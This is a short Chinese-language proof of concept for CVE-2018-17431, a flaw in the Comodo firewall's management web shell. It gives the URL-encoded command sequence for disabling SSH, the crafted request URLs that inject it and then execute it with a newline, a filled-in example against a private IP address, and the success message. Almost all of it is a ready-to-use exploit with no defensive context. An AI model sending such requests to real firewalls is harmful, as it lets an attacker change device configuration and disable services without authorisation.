CVE-2018-17431 的概念验证
漏洞利用:
WebShell 模拟:
例如,在 web shell 中禁用 SSH 的操作如下:
- service [hit enter]
- ssh [hit enter]
- disable [hit enter]
编码
将上述序列进行 URL ECODING
(我使用了 Burp 编码插件)
%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a
运行
基础 URL:https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=[Encoded_Command]&l=[Integer]&_=1534440840152
https://[Comodo_Firewall_IP]:[WebPort]/manage/webshell/u?s=[Integer]&w=100&h=24&k=%0a&l=[Integer]&_=1534440840152(额外的回车键用于执行命令)
示例:https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=21&_=1534440840152
https://192.168.250.10:10443/manage/webshell/u?s=4&w=100&h=24&k=%0a&l=21&_=1534440840152
页面将显示 "Configuration has been altered" 信息,并且配置已更改!